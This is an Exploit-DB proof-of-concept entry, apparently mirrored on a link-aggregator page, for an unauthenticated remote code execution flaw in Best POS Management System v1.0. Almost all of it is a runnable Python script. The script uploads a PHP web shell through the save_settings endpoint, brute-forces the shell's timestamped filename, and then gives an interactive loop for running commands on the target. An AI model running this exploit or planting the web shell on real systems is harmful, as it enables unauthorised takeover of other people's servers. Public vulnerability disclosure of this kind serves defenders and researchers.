2
[webapps] Best POS Management System v1.0 - Unauthenticated Remote Code Executio...
source link: https://www.exploit-db.com/exploits/51462
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
import sys
import requests
import subprocess
import time
if len(sys.argv) < 2:
print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
print("Example: %s 192.168.106.130" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
def brute_force_timestamp(timestamp_prev, ip):
progress = 0
webshell = None
for i in range(20):
for j in range(0, 1000, 20):
timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
response = requests.get(url)
if response.status_code == 200:
webshell = url
break
progress += 1
print(f"Attempt {progress}/400", end="\r")
time.sleep(0.1)
if progress >= 400:
break
if webshell or progress >= 400:
break
if webshell:
print("\033[92m[+] Webshell found:", webshell, "\033[0m")
else:
print("\033[91m[-] Webshell not found\033[0m")
return webshell
def get_unix_timestamp():
timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
return int(timestamp)
def extract_output(response_text):
start_tag = "<pre>"
end_tag = "</pre>"
start_index = response_text.find(start_tag)
end_index = response_text.find(end_tag)
if start_index != -1 and end_index != -1 and start_index < end_index:
output = response_text[start_index + len(start_tag):end_index]
return output.strip()
return None
def code_execution(webshell):
if not webshell:
print("\033[91mWebshell URI not provided\033[0m")
return
while True:
command = input("Enter command to execute (or 'exit' to quit): ")
if command == 'exit':
break
url = webshell + f"?cmd={command}"
response = requests.get(url)
output = extract_output(response.text)
if output:
print("\033[93m[+] Output:\033[0m")
print(output)
else:
print("\033[91m[-] No output received\033[0m")
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"
9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"
test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''
headers = {
'Host': f"{ip}",
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
'Content-Length': str(len(data)),
'Connection': 'close'
}
timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200 and response.text == '1':
print("[+] Timestamp: %s" % timestamp_prev)
print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
webshell = brute_force_timestamp(timestamp_prev, ip)
code_execution(webshell)
else:
print("Did not worked")
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK